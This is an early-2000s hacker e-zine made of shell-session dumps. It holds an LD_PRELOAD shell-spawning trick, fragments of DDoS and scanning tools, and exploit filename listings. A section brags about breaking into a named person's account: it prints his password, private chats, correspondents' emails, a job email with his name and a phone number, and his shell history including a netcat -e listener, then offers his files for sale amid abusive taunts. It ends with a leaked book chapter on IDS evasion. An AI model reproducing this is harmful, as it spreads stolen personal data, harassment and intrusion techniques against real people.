OC-3\'s use what technology for a medium? : fiber
DS-3\'s use what for a medium? : Copper
how big is my cock : as big as a broken crayola
how big is my dick? : 11 inches around
m4v1s@~el8:/0wned/og# lynx sysctl.html
Date: Tue Apr 30 20:57:52 CDT 2002
From: ben-z <ben@ohgee.org>
To: YOU!
Subject: Neat IP Options in FreeBSD-4.4+
Just thought I'd pass along a few neat freebsd tricks I learned today:
sysctl net.inet.udp.blackhole=1 - the boxen will not respond with an RST when it receives
a UDP packet on a closed port
sysctl.net.inet.udp.blackhole=2 - the boxen does nothing when a UDP packet is received for
a closed port
or
sysctl.net.inet.tcp.blackhole=1 or =2 - same as above, but for TCP
The following lines can also be added to /etc/rc.conf for extra security:
tcp_drop_synfin="YES" -- the boxen will drop tcp packets with both the SYN+FIN flags set
(prevents OS fingerprinting)
log_in_vain="YES" -- connections to ports that have no listening socket will be logged
tcp_restrict_rst="YES" -- the kernel will no longer respond with an RST for invalid tcp
packets
icmp_drop_redirect="YES" - the kernel will ignore ICMP_REDIRECT messages
Enjoy,
ben-z
ben@ohgee.org
"The information transmitted is intended only for the person or entity to which it is
addressed and may contain confidential and/or privileged material. Any review,
retransmission, dissemination or other use of, or taking of any action in reliance upon,
this information by persons or entities other than the intended recipient is prohibited.
If you received this in error, please contact the sender and delete the material from all
computers."
m4v1s@~el8:/0wned/og# cat strcpy.txt
bash-2.05# cat test.c
int main(int argc, char *argv[]) {
char buf[100];
strcpy(buf,argv[1]);
return 0;
}
bash-2.05# su - ben
su-2.05$ cat strcpy.c
char *strcpy(char *dst,char *src) {
system("/bin/sh");
return 0;
}
su-2.05$ gcc -c -static strcpy.c
strcpy.c:1: warning: conflicting types for built-in function `strcpy'
su-2.05$ ld -shared -o strcpy.so strcpy.o
su-2.05$ LD_PRELOAD="/home/ben/strcpy.so" ; export LD_PRELOAD
su-2.05$ ./test
$ id
uid=1000(ben) gid=1000(ben) groups=1000(ben), 0(wheel)
m4v1s@~el8:/0wned/og/members/jaynus/code/asm# cat print.s
.section .data
string_to_print:
.ascii "hahahah owned\n"
.text
.global _start
_start:
movl $4, %eax
movl $1, %ebx
movl $string_to_print, %ecx
movl $14, %edx
int $0x80
movl $1, %eax
xorl %ebx, %ebx
int $0x80
m4v1s@~el8:/0wned/og/members/jaynus/code# head -n 20 cfg-parse.c |less
/* Example high level config parsing */
#include <stdio.h>
#define SHIT 1
#define POO 2
#define FUCK 3
struct cfg
{
char *shit;
char *poo;
char *fuck;
};
int main(int argc, char *argv[])
{
FILE *fd;
struct cfg *in;
char buff[255], *cmd;
m4v1s@~el8:/0wned/og/files/music# ls
ben-z-illumination_beyond.mp3* index.php.save*
ben-z-story_to_tell.mp3* shekk-just_another_day-part2.mp3*
ben-z_feat_gamble-illusions_freestyle.mp3* shekk-luck_is_your_only_god.mp3*
ben-z_feat_gamble-reflections_freestyle.mp3* shekk-top_of_dee_world.mp3*
index.html* shekk-wakin_up_bluez.mp3*
index.php*
m4v1s@~el8:/0wned/og/files/music# cd ../../
m4v1s@~el8:/0wned/og# cat ANNOUNCEMENT-040202.txt
OHGEE:
After playing around with our new domains, teamog.org and ohgee.org, I thought of
a great idea of how to regulate vhosts and email addresses! The problem is this:
the domains arent hosted on my box and theres nothing i can do about that. i simply
cant give _everyone_ who idles in the channel a bnc and email address. However,
i can provide tons of email addresses and a few bncs. SOOOOOO, the way I'm thinking
would be most appropriate for dividing up who gets what, is to make this offer:
* The first _WORTHWHILE_ package/code/text you submit to be posted on the site, you
will recieve an @ohgee.org or an @teamog.org email forward or pop3 account. your choice.
* The second (see above) you submit, i will do everything i can to hook you up with
ONE bnc to connect to efnet. A few people may have to share an ident due to the background
process restrictions, but fuck man its still a r33t bounce =]
*** The only other way you can get a teamog.org/ohgee.org subdomain is if you have
a LEGIT root boxen that you control the reverse dns for, AND we must ensure that only
og members can access that IP. i.e. ipfw must be setup to restrict that IP from every
user but you.
if you guys absolutely hate this idea let me know, but jaynus and i are the
only ones who paid money for this shit, so eat a cock =]
sincerely,
ben to the motherfucking z, BITCH.
ben@teamog.org
m4v1s@~el8:/0wned/og#
m4v1s@~el8:/0wned/og/ioho/one# ls
alfred.pl* cockblaster.irc* fawx3.c* ioho1.jpg* og-brute101.tgz* strscan2b1.c*
angst.txt* collegehowto.txt* index.html* kevorkian.txt* quotes.txt* tyrone1.tgz*
bacotell.txt* dbsnatch1.tgz* ioho-5-2001.tgz* mrps-v01.c* rvscan-v4.tgz*
m4v1s@~el8:/0wned/og/ioho/one# head *.pl *.txt *.irc *.c|less
==> alfred.pl <==
#!/usr/bin/perl -w
#
# example ddos server for non-root shells using perl sockets..
# listening port disuises itself as an eggdrop irc bot.
#
# crafted by: heeb (heeb@phayze.com) [#og @ irc.ndrsnet.com]
#
# version 0.1 (2/19/2001):
# very slow.. needs a whole lot of work to make it worth using.
# includes ident request flood, http GET / flood, smtp HELO flood,
==> angst.txt <==
so here i am, 18 years old and lost. 18 years old and
prescribed to prozac. 18 years old and 2 times a dropout. is it
wrong of me to not want to go to college? is it wrong of me to think
maybe theres something more out there for me than 4 more years of
fucking school? i never pictured myself working a normal 9 to 5. i
mean i love computers technology in general, but i still dont want
to be sitting in a fucking cubicle coding my whole life. i
always wanted to be something more than that. i just want to be remembered
for something. i want to be more than just another rat in the race. but i dont know
if i have it in me to be something special. maybe im destined to be
==> bacotell.txt <==
[og] hacking "baco tell" for fun and profit. *wink* *wink*, *nudge* *nudge*
Step 1:
order something that normally comes with tomatoes and has the "red sauce"
in it (i.e. a pexican mizza). specifically ask for "no tomatoes".
make sure to keep your reciept.
Step 2:
since the magic red sauce that they use has tomatoes in it, you will get
tomatoes. eat almost all of your food, but save a piece of it that has a
==> collegehowto.txt <==
how to fail out of college
by the ph4rcyd3
you may be thinking to yourself, "sheeeet, how hard could it be to fail out of college?"
but believe me, its a lot harder than you think. step 1: have yourself a really laid back senior year.
i mean, get into college and everything first. make sure its really far away too. you dont wanna be
stuck in your shit town forever.
then, get high before classes, skip school, sleep all day. come on! its your god given right as a senior to fuck up.
go the to prom with a hot ass chick, get her all drunk and fuck the shit out of her afterwards. then at graduation, dont wear a god damn thing under your gown,
and when you get your diploma, give your entire class a fruit bowl.
==> kevorkian.txt <==
the kevorkian
by halcy0n
the kevorkian bong was introduced to me a few weeks ago by a
friend of mine named bob. bob, being a pretty big pothead, had all
sorts of k-neeto smoking devices in his room. one of which, was a little
contraption he called the kevorkian. after 2 good hits off this mofo
i was toeeeeeeeee up. so, you want one? well heres how you make em.
materials needed
==> quotes.txt <==
<DeaDLinE> all i was doing was nukeing
<Genuwine> I'm not a playa, i just crutch alot
<Genuwine> I'm an expert on computer physics and how they work and what happens when u do this or that.. I only started nukes yesterday.. I'm a novice..
<HrshySqrt> I can crash your harddirve
[BeloZer0(warez@okcnasz-21.ionet.net)] i actually run Win98 and Linux dipship
!DuCkTaPe!*! [forfeit(teet@hey.laserlips.your.mother.was.a.snowblower)] JOHNNY FIVE IS ALIVE@#%!
<c0sm0s1> i gotz a bad case of carpool tunnel syndrome!
<JsFknChst> isnt it fun to rap freestyle while taking a dump
<JsFknChst> i thought it was some semi leet hax cult. and figured since i was a new member. i would
show off my power
<ferk-o> fuck me gently with a chainsaw and call me mother threasa
==> cockblaster.irc <==
#
# [og] cockblaster.irc, makes up a whole lot of random insults.
# compiled by #og @ irc.ndrsnet.com for good wholesome family fun!
#
@cb=[^B!^Bcb^B!^B]
@one.0=[johnson]
@one.1=[cock]
@one.2=[dyke]
@one.3=[clitoris]
==> fawx3.c <==
/* [og] fawx3.c, sends every type of icmp/igmp type+code to <host>
* -- heeb (heeb@phayze.com), #og @ irc.ndrsnet.com
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
==> mrps-v01.c <==
/*
* [ Mass RPC Program Scanner v.01 ]
* <( IOHO - 2001 )>
*
* quick, simple rpc scanner. scans a class a/b/c, list, single ip for
* running rpc programs. upcoming versions will utilize multiple sockets
* for speed, specific rpc id searching, and small os fingerprinting.
* look for further versions.
*
* thanks: robosok for debugging help
==> strscan2b1.c <==
/* ( IOHO 2001 #og irc.ndrsnet.com ) */
/* strscan.c v2b1 by ka0z@ndrsnet for IOHO E-Zine http://chickenz.net/og */
/* Basically, I made this for myself and it was suggested that I put */
/* this in the e-zine so I did. Any ideas on how to implement the */
/* multiple line banner checking would be greatly appreciated. */
/* this has been optimized with ntohl and htonl and shit like that blah */
/* blah blah blah.....ok */
#include <stdio.h>
m4v1s@~el8:/0wned/og/0day# ls
0x3a0x29snmp.c bacotell.txt htwatch-1.1.tgz pr0nhoar.sh trinscan-v1.0b2.tgz
2600-cable_uncap.txt blades.txt idq5.c quotes.txt tyrone1.tgz
73501867.c bsdtelnetd.c kevorkian.txt rvscan-v4.8.tgz x2
7350854.c cockblaster.irc mnemninja/ rvscan-v4.tgz x2.tgz
7350bind9-39273.c collegehowto.txt mrps-v01.c shells-v1.tgz x2src.tar.gz
7350cfsd.tgz dbsnatch1.tgz muhaha.tgz shellsv1.tgz x3.tgz
7350squish.c delegate6x.c netkit-telnetd.c slogin-sexter.c x4.tar
7350telnet.c dtspcx.c og-brute101.tgz solftpd.c x5.tgz
7350wurm.c eggkill.irc og-snmp.c solsafe-0.1.tgz xaim.sh
alfred.pl fawx3.c ogfw1.tgz strscan2b1.c xgdb.pl
angst.txt fuckm.sh osshchans-1.3.tgz targets
asp5.c hhp-netd.tgz pass targets.dat
m4v1s@~el8:/0wned/og/0day#
***** ~el8 ***** ~el8 ***** ~el8 ***** ~el8 ***** ~el8 ***** ~el8 *****
END STRAT3G1k 0DAY DUMP
.~e~----------------------------------------------------------~e~.
; *14* lyfestylez of the owned and lamest with aempirei -- b_ ;
`----------------------------------------------------------------'
<b_> hello this is b_
<b_> as you all know i hate aempirei's g*tz
<b_> i will show you around his account on gravitino
<b_> aempirei you are a pussy and i'll kick your fucking ass
<b_> btw i fucked your fiance
$ ssh -l aempirei gravitino.net
aempirei@gravitino.net's password: BoW-is-leet
$ ls -a
./ IrcLog naim*
../ Mail/ naim.core
.BitchX/ SearsMCBill naim.log
.addressbook Stereotype.tar.gz newfile
.addressbook.lu The Society of Strings.doc ngram-talker.tar.gz
.bash_history ainow.doc pics/
.bitchxrc ainow.prn public_html/
.cshrc ambient_idm.mp3 q/
.cyp.fsave bscan.cpp r3sum3.doc
.faimrc byz-io.ps readme
.history data_me reals.doc
.indent.pro e.gz reals.prn
.irlrc elite resume.txt
.login end-fs.doc scanner.tar.gz
.lynx_cookies fofo shit.txt
.mailrc irftpdx.c stream_idm
.pine-debug1 iwt/ tars/
.pine-debug2 iwt.tar.gz uip-0.6.tar.gz
.pine-debug3 kengstrom.doc webcrawl/
.pinerc logo.gz webcrawl.tgz
.profile mail/ wuexploit/
.ssh/ mbox wux86_glob.c
.tcshrc misccode/ x2-devel/
AIMDump.c moreCA.tar.gz zip-ssh*
<b_> as you can fucking see we not only kicked your ass, we own your
+ dumb ass
$ head AIMDump.c
/* AMBIENT EMPIRE */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <pcap.h>
#include <ctype.h>
<b_> we have all your 0day qualys warez
$ less -R IrcLog
[msg(aempirei)] well if you think you are then letz go to the doctor
[aempirei(aempirei@gravitino.net)] good idea
[aempirei(aempirei@gravitino.net)] thats what i want to do
[msg(aempirei)] okie
[aempirei(aempirei@gravitino.net)] its just i've had this burning sensation
[msg(aempirei)] me too
[aempirei(aempirei@gravitino.net)] we should get checked that is all
[msg(aempirei)] honey, i agree
<b_> we have all your private irc convos
$ ls iwt
3net fullscan* logo-large report-livescan.c
768scan.c home/ logo-med report-tracemap.c
768scan.conf icons/ makepic* report3d-tracemap.c
MD5 ifret.c mkips* scan-main.c
Makefile include/ myfont.c sysfuncs.c
README ipv4.c osident-main.c tcpscan.c
dnslookup* legend.php* osident.c tcpscan.conf
draw-topology.c lib/ osprints.conf tracemap.c
drawer.php* livescan.c packets.c
fasttrig.c livescan.conf php/
<b_> look, more qualys-warez
$ cat mbox
> From: aempirei@gravitino.net [mailto:aempirei@gravitino.net]
> From: research@camisade.com [mailto:research@camisade.com]
> To: '&'
> To: BUGTRAQ@SECURITYFOCUS.COM
> To: Olivier Devaux
> To: Ralph Logan
> To: aempirei@gravitino.net
> To: oliv@qualys.com
> To: radix@camisade.com
> To: rlogan@camisade.com; jw@mksecure.com
> To: team-radix@camisade.com
Delivered-To: ani-abettini@camisade.com
Delivered-To: ani-all@camisade.com
Delivered-To: ani-cabad@camisade.com
Delivered-To: ani-cts-radix@camisade.com
Delivered-To: ani-info@camisade.com
Delivered-To: ani-radix@camisade.com
Delivered-To: ani-research@camisade.com
Delivered-To: ani-rlogan@camisade.com
Delivered-To: ani-team-radix@camisade.com
Delivered-To: ani@hert.org
Delivered-To: eugene@localhost.securityarchitects.com
Delivered-To: kendra@blandest.org
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: mailing list pen-test@securityfocus.com
From: "Adam O'Donnell" <adam@IO.ece.drexel.edu>
From: "Ambient Empire" <aempirei@ucla.edu>
From: "Ben Weber" <Ben.Weber@greythorninc.com>
From: "Chad Pringle" <chad@emerson-brooks.com>
From: "Customer Support" <cs@eastbaytechjobs.com>
From: "DICE" <nobody@dice.com>
From: "David Litchfield" <nisr@nextgenss.com>
From: "David Rhodus" <sdrhodus@wildcatblue.com>
From: "Dee and Galen Engstrom" <rendee@trvnet.net>
From: "Edg Duveyoung" <edg@iqtest.com>
From: "Home2" <home2@visiondirect.com>
From: "InvestBio_Report@aol.com" <InvestBio_Report@aol.com>
From: "Jay Doscher" <jay@doscher.com>
From: "Kathleen Koepp" <koepp2775home@earthlink.net>
From: "Kendra Engstrom" <dayzee@fade-out.org>
From: aempirei@gravitino.net [mailto:aempirei@gravitino.net]
From: aempirei@gravitino.net [mailto:aempirei@gravitino.net]
From: ani <ani@plan9.hert.org>
From: ani@hert.org
From: anonymous@segfault.net
From: awr <awr@gravitino.net>
From: awr <awr@plan9.hert.org>
From: awr@gravitino.net
From: bidconfirm@ebay.com
From: obecian <obecian@iga.packetninja.net>
From: pandora <pandora@gravitino.net>
From: private static void <javaman@west.philly.ghetto.org>
From: proletariat <prole@redgeek.net>
To: messiah
To: pen-test@securityfocus.com
To: peter@slagheap.net, barclay@mp3.com, mark@stateful.net,
To: proletariat <prole@redgeek.net>
To: radix@camisade.com
To: rika@smtp.well.com
To: rlogan@camisade.com, all@camisade.com
To: shok@dataforce.net
To: siphon@gravitino.net
To: swezlex@yahoo.com
To: team-radix@camisade.com
To: xbud@g0thead.com
To: <all@camisade.com>
To: <bugtraq@securityfocus.com>
To: <cecile.osta@novamedia.fr>
To: <chris@gravitino.net>
To: <gravitino@gravitino.net>
To: <hoglund@clitcktosecure.com>
To: <kendra@blandest.org>
To: <radix@camisade.com>
To: <sbracken@clicktosecure.com>
To: <siphon@gravitino.net>
<b_> i luv mail
$ cat .ssh/known_hosts
redondo.pic.ucla.edu,128.97.12.10
192.168.1.2
64.167.139.59
adsl-64-167-139-59.dsl.snfc21.pacbell.net
undef.net,66.126.234.62
$ head wux86_glob.c
/*## wux86_glob - x86/linux wuftpd <= 2.6.1 remote root exploit #*//*## written by bind <bind@insidiae.org> jan 2002 USA #*/
/* THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE - DO NOT DISTRIBUTE *//* this is proof of concept software. in no event shall the author be *//* liable for any direct, indirect, incidental, special, exemplary or *//* consequential damages resulting from the use of misuse of this software. */
#include <stdio.h>
#include <string.h>
<b_> im going to kick bind's ass too
$ head wuexploit/fuckwu.c
/*
* fuckwu - wuftpd <= 2.6.1 remote root exploit
* written by bind & aempirei
* 12-6-2001
* private source code.
* do not distribute.
*/
#include <stdio.h>
#include <unistd.h>
<b_> msg me for source code
$ ls misccode/
aetrojan.c fmt.c haq.c inliner.c p.c tsl_bind.c
dnssniff.c fmtg.c identd.c nbtmap.c shit.c
$ head naim.log
*** Log opened 2002-01-02T10:38.<br>
Ambient Empire -> Catastr0phik | what up<br>
Catastr0phik -> Ambient Empire | <HTML><BODY BGCOLOR="#ffffff">purrrrrrrrrrrrrrrrr</BODY></HTML><br>
Catastr0phik -> Ambient Empire | <HTML><BODY BGCOLOR="#ffffff">how exciting!<BR></BODY></HTML><br>
Catastr0phik -> Ambient Empire | <HTML><BODY BGCOLOR="
$ cat .bash_history
ls -l
scr-bx -?
scr-bx -h
scr-bx -l
scr-bx ttyp2
scr-bx 34533
scr-bx -l
scr-bx 41799
mutt
exit
mutt
ls
ls
ls -l
cd /usr/
ls
cd src/
ls
cd ..
cd include/
ls
cd net
ls
vi if_ieee80211.h
mutt
exit
scr-b
scr-bx
exit
mutt
scr-bx
mutt
exit
mutt
scr-bx
mutt
exit
scr-bx
mutt
exitr
exit
scr-bx
mutt
exit
BitchX aempirei irc.dal.net
exit
ls
cd to
cd public_html/
ls
tar xvfz nc110.tgz
cd nc110
ls
vi Makefile
CAT *|GREP GAPING
cap *|GREP GAPING
cat *|GREP GAPING
cat *|grep GAPING
make -DGAPING_SECURITY_HOLE
make linux -DGAPING_SECURITY_HOLE
make linux -DGAPING_SECURITY_HOLE
make -?
make linux -D GAPING_SECURITY_HOLE
exit
cd public_html/
cd nc110q
cd nc110
ls
make linux -D GAPING_SECURITY_HOLE
ls -l
vi Makefile
exit
cd public_html/
ls
cd nc110
vi Makefile
ls
tar cvfz nc110.tgz nc110
rm -rf nc110
tar xvfz nc110.tgz
cd nc110
ls
vi Ms
bastard
vi Makefile
make linux
ls
./nc
./nc -l -p 1666 -e /sbin/shutdown
exit
xsw public_html
cd public_html/
ls
cd nc110
ls
cd
l
ls
vi code.c
vi die.c
man bind
vi die.c
man accept
vi die.c
ls
gcc die.c -o d
man netinet
man inet_ntoa
vi die.c
gcc die.c -o d -Wall
vi die.c
gcc die.c -o d -Wall
vi die.c
man accept
vi die.c
exit
mutt
scr-bx
cd .BitchX/
ls
cat BitchX.away
cat BitchX.away |grep -v Time
cat BitchX.away |grep -v Time|grep MSGS
scr-bx
exit
mutt
ping mail.fade-out.org
mutt
exit
mutt
scr-bx
BitchX dayzee mclean.va.us.undernet.org
eixt
exit
mutt
mutt
exit
mutt
telnet beta.eshop.msn.com
telnet beta.eshop.msn.com 80
ping beta.eshop.msn.com 80a
ping beta.eshop.msn.com
ping help.microsoft.com
mutt
mutt
telnet mail.the-mathclub.net 25
mutt
ls
exit
mutt
BitchX sempirei mclean.va.us.undernet.org
muyy
mutt
mutt
ls
BitchX aempirei
exit
telnet www.hackphreak.org 8080
telnet www.hackphreak.org 8081
telnet m4dsekc1.net 3140
telnet 24.21.53.20 31410
telnet 24.21.53.204 31410
telnet 24.21.53.204 31410
telnet 24.21.53.204 31410
telnet 24.21.53.204 31411
BitchX aempirei mclean.va.us.undernet.org
exit
mutt
EXIT
scr-bx
exit
mutt
telnet host-216-76-233-57.hsv.bellsouth.net 139
telnet host-216-76-233-57.hsv.bellsouth.net 135
telnet host-216-76-233-57.hsv.bellsouth.net 22
telnet 24.21.53.204 77
telnet 24.21.53.204 77
exit
BitchX aempirei us.undernet.og
BitchX aempirei us.undernet.org
BitchX aempirei us.undernet.org
mutt
scr-bx
exit
telnet whois.airn.net whois
telnet whois.arin.net whois
BitchX aempirei mclean.va.us.undernet.org
mutt
scr-b
scr-bz
BitchX aempirei mclean.va.us.undernet.org
mutt
exit
telnet www.hackphreak.org 8080
telnet www.hackphreak.org 8080
telnet www.hackphreak.org 9460
exit
mutt
scr-bx
BitchX aempirei mclean.va.us.undernet.org
mutt
scr-bx
BitchX rloxley www.hackphreak.org 9640
mutt
BitchX rloxley www.hackphreak.org 9460
BitchX rloxley www.hackphreak.org:9460
exit
BitchX aempirei mclean.va.us.undernet.org
scr-bx
BitchX aempirei mclean.va.us.undernet.org
BitchX aempirei mclean.va.us.undernet.org
exit
<b_> owned mrmittens style
$ ls public_html/
1.jpg cam2.html ipids ngram-talker.tar.gz
2.jpg cawave.html jb.jpg papers/
3.jpg chiq.jpg k.html pokemon/
3rd/ code/ kengstrom-2.doc poster-rc2.tif
3rd.zip die.c kengstrom-2.txt poster.gif
4.jpg elite.gif kengstrom.doc r3sum3.doc
DurSec01/ elite.jpg kengstrom.txt r3sume.doc
GCIB/ elitespeak.c kengstrom1.doc statement.html
IrcLog fairytales1.txt links.html terminal.c
JavaCam.class fishtank.jpg main.html toolkit/
analysis/ french/ me.html twiggs1.jpg
archives/ fucker.jpg me2.html virtualip.doc
bhp.html hohoho.big.gif my_config wacked.html
boxing2.jpg index.html nastyman.2.tar.gz weapon.mp3
cam.html index.old.html nc110.tgz
$ ls public_html/code public_html/papers/ public_html/archives/
public_html/archives/:
ae-gateway.aug01+1.tar.gz ae-nat.aug01+1.tar.gz ae-rsnoop.aug07+1.tar.gz
ae-gateway.aug03+1.tar.gz ae-nat.aug06+1.tar.gz ae-shady.aug29+1.tar.gz
ae-gateway.aug06+1.tar.gz ae-nat.jul31+1.tar.gz ae-snitch.aug06+1.tar.gz
ae-gateway.jul26+1.tar.gz ae-pty.aug06+1.tar.gz ae-snitch.jul26+1.tar.gz
ae-gateway.jul27+1.tar.gz ae-pty.jul26+1.tar.gz archives.html
ae-gateway.jul29+1.tar.gz ae-rsnoop.aug04+1.tar.gz makehtml*
ae-gateway.jul30+1.tar.gz ae-rsnoop.aug05+1.tar.gz
ae-gateway.jul31+1.tar.gz ae-rsnoop.aug06+1.tar.gz
public_html/code:
fmtg.c sboxes.c sipra.c wormsim* wormsim.c
public_html/papers/:
ainow.pdf ipccc.pdf reals.doc reals.pdf rh2hpcp.pdf trustedeke.doc
$ cat importantemail
From olivier@qualys.com Wed Dec 5 17:43:22 2001
Return-Path: <olivier@qualys.com>
Delivered-To: aempirei@gravitino.net
Received: from smtp.qualys.com (mx1.qualys.com [195.68.109.150])
by gravitino (Postfix) with ESMTP id 313A74ADB10
for <aempirei@gravitino.net>; Wed, 5 Dec 2001 17:43:21 -0800 (PST)
Received: from VAIO (smtp.qualys.com [195.68.109.150])
by smtp.qualys.com (8.12.1/8.12.1) with SMTP id fB61cXPB031764
for <aempirei@gravitino.net>; Thu, 6 Dec 2001 02:38:34 +0100
From: "Olivier Devaux" <olivier@qualys.com>
To: <aempirei@gravitino.net>
Subject: RE: Resume etc.
Date: Wed, 5 Dec 2001 17:40:30 -0800
Message-ID: <FKEALHJMBDGGBEACJEILCEFADFAA.olivier@qualys.com>
MIME-Version: 1.0
Content-Type: text/plain;
charset="US-ASCII"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
In-Reply-To: <20011205171320.A29633@gravitino.net>
Status: RO
X-Status: A
Content-Length: 1134
Lines: 45
Hello Christopher,
Leona was right and silvio is also coming
in the us office before the end of the year.
After reading your resume, you fit exactly the
profile we are loking for.
So tell me when you will be in the bay aera
to setup an interview in our office.
If you have any question don't hesitate to mail me
or to phone me.
My phone number is (650) 801-6120
Thanks for your interest in our company.
Oliv.
> -----Original Message-----
> From: aempirei@gravitino.net [mailto:aempirei@gravitino.net]
> Sent: Wednesday, December 05, 2001 5:13 PM
> To: oliv@qualys.com
> Subject: Resume etc.
>
>
> Hello,
>
> My name is christopher abad. I was told by
> Leona, a friend of Silvio's that Qualys will
> be opening a San francisco office and to
> contact you in possible R&D Job opportunities.
> I am currently employed by foundstone inc.
> but am returning home to san francisco before
> christmas and would be interested in exploring
> any possible opportunities in san francisco.
> attached is my resume in word format. i appeciate
> the time you have taken to review my email.
>
> best regards,
> christopher abad
<b_> after alot of thinking
<b_> i have decided to sell aempirei's homedir, and the gravitino box tars
<b_> at defcon if you get a hold of me, i will be selling aempirei's homedir
<b_> for $15, and gravitino box (all users) for $30
<b_> i'll have them burned to cd's
<b_> oh and shouts to mrmittens, and vmy/hi for hacking aempirei
<b_> and to ~el8 for letting me put this in the ezine
[CUT_HERE] ch16
.~e~----------------------------------------------------------~e~.
; *15* chapter sixteen -- ktwo ;
`----------------------------------------------------------------'
y0y0y0y0y0y0, hey ladies and gents, I just thought maybe I would
take a risk and include chapter 16 of Hack Proofing Your Network
before the book is released. This is the unedited version, fresh
off the printing press. Have fun, and remember, I will be autogr-
aphing copies of Know Your Enemy for free at this upcoming defcon.
Chapter 16:
Ryan, suggest places for inclusion of code and screenshots, as requested.
Id like to see some screenshots, packet prints, command-line options or something for the fragrouter section.
Grammar and style was a bit awkward and punctuation was sparse. I did one pass-through (didn't track the easy edits, so it wouldn't be too hard on the eyes), please highlight anything you feel is still awkward and needs to be clarified by the author.
I like the material a lot. Just need to fix wording in a few spots, as mentioned.
Chapter 16
IDS Evasion
Solutions in this chapter:
Understanding How Signature-Based IDSs Work
Using Packet Level Evasion
Using Protocol and Application Protocol Level Evasion
Using Code Morphing Evasion
Chapter suggestions for:
Examples and Exercises:
Check for the specific code called for in each section
Screen Shots:
Screenshots for each program called for
Introduction
One of the laws of security is that all signature-based detection mechanisms can be bypassed. This is as true for Intrusion Detection System (IDS) signatures as it is for virus signatures. IDS systems, which have all the problems of a virus scanner, plus the job of modeling network state, must operate at several layers simultaneously, and they can be fooled at each of those layers. IDS have all the problems of a virus scanner, plus the job of modeling network state.
This chapter covers techniques for evading IDSs. These techniques include playing games at the packet level, application level, and morphing the machine code. Each of these types can be used individually, or together, to evade detection by an IDS.
In this chapter, we present several examples of how an attack might evade detection.
Understanding How Signature-Based IDSs Work
An IDS is quite simply the high-tech equivalent of a burglar alarma burglar alarm configured to monitor access points, hostile activities and known intruders. These systems typically trigger on events by referencing network activity against an attack signature database. If a match is made, an alert will take place and will be logged for future reference. It is the makeup of this signature database that is the Achilles heel of these systems.
Attack signatures consist of several components used to uniquely describe an attack. An ideal signature would be one that is specific to the attack while being as simple as possible to match with the input data stream (large complex signatures may pose a serious processing burden). Just as there are varying types of attacks, there must be varying types of signatures. Some signatures will define the characteristics of a single IP option, perhaps that of a nmap portscan, while others will be derived from the actual payload of an attack.
Most signatures are constructed by running a known exploit several times, monitoring the data as it appears on the network and looking for a unique pattern that is repeated on every execution. This method works fairly well at ensuring that the signature will consistently match an exploit attemptattempt by that particular exploit. Although I have seen my share of shoddy signatures, some so simplistic in nature that the amazingly hostile activity of browsing a few Websites may set them off, remember the idea is for the unique identification of an attack, not merely the detection of attacks.
Tools & Traps
Signature Components
The following are Eexample snort Snort signatures:
Breaks and indents for wrapping lines OK?
Looks good to me.
alert tcp $EXTERNAL_NET any -> $HOME_NET 8080 (msg:"SCAN Proxy
attempt";flags:S; classtype:attempted-recon; sid:620;
rev:1;)
alert ip $EXTERNAL_NET any -> $HOME_NET :1023 (msg:"SHELLCODE
linux shellcode"; content:"|90 90 90 e8 c0 ff ff ff|/bin
/sh"; classtype:attempted-admin; sid:652; rev:2;)
alert tcp $EXTERNAL_NET any -> $HOME_NET 21 (msg:"FTP CWD ...";
flags:A+; content:"CWD ..."; classtype:bad-unknown; sid:1229
; rev:1;)
alert icmp $EXTERNAL_NET any -> $HOME_NET any (msg:"ICMP
traceroute ipopts"; ipopts: rr; itype: 0; classtype:
attempted-recon; sid:475; rev:1;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"WEB-
ATTACKS chgrp command attempt"; flags:A+; content:"/usr/bin/
chgrp";nocase; sid:1337; rev:1; classtype:web-application
-attack;)
Here are some basics of snort signatures. Snort implements a description language used to construct any rule. Im not going toTo avoid getting into the rather complex details of writing your own signatures, but just point out enough to get us on our way. Llets simply go left to right through the examples above and try to discern what exactly theyse mean. We can see that these all define a type of alert. These alerts are then classified into a type of protocol, then the specific details are given, : IP address ($EXTERNAL_NET and $HOME_NET are variables usually defined as 10.10.10.0/24 CIDR style) and port numbers to restrict the scope. The msg keyword defines the message that will be sent out if the rule is matched;, flags will define which of the TCP flags are set in the stream;, just as ipopts dictates the options of an IP packet; and content is used to specify a unique series of data that appears in the actual contents of the packet. In a content field, anything between vertical bars is in hex format, while the rest is ASCII.
The first rule watches for any attempt from the outside to connect to an inside host at TCP port 8080, which is a port often used for web proxies. The second rule looks for a commonly-used shellcode sequence inside any IP packet going to a port less than 1024. (The :1023 is shorthand for a range of ports between 0 and 1023, inclusive.) The third rule is checking for a CWD
command to TCP port 21, the FTP port. The fourth rule is watching for IP packets with the rr (Record Route) option on. The final rule is checking for the string /usr/bin/chgrp going to port 80, the HTTP port.
Computing systems, in their most basic abstraction, can be defined as a finite state machine, which literally means that there are only a specific predefined number of states that a system may attain. This crux limitation hinders the IDS in that it can to be only well armed at only a single point in time (i.e. as well armed as the size of its database). First, Hhow can one have foreknowledge of the internal characteristics that make up an intrusion attempt that has not yet occurred? You cant alert on attacks youve never seen before. There Second, there can be only educated guesses that what has happened in the past may again transpire in the future. You can create a signature for a past attack after the fact, but thats no guarantee youll ever see that attack again.,. Third, most an IDS are may be incapable of discerning a new attack from the background white noise of any network. The network utilization may be too high or many false positives cause rules to be diabled.; aAnd finally, it may be incapacitated by even the slightest modification to a known attack. It is ether a weakness in the signature matching process or more fundamentally a weakness in the packet analysis engine (packet sniffing/reconstruction) that will thwart any detection capability.
Youre getting too abstract for me to follow here. I dont follow where youre going with the state-machine discussion. Are you trying to point out that the external IDS has to model the state of the victim? I think what youre saying is that 1) You cant alert on attacks youve never seen before, 2) You can create a signature for a past attack after the fact, but thats no guarantee youll ever see that attack again
is 3) relating to anomaly detection? Point 4 is understandable as-is.
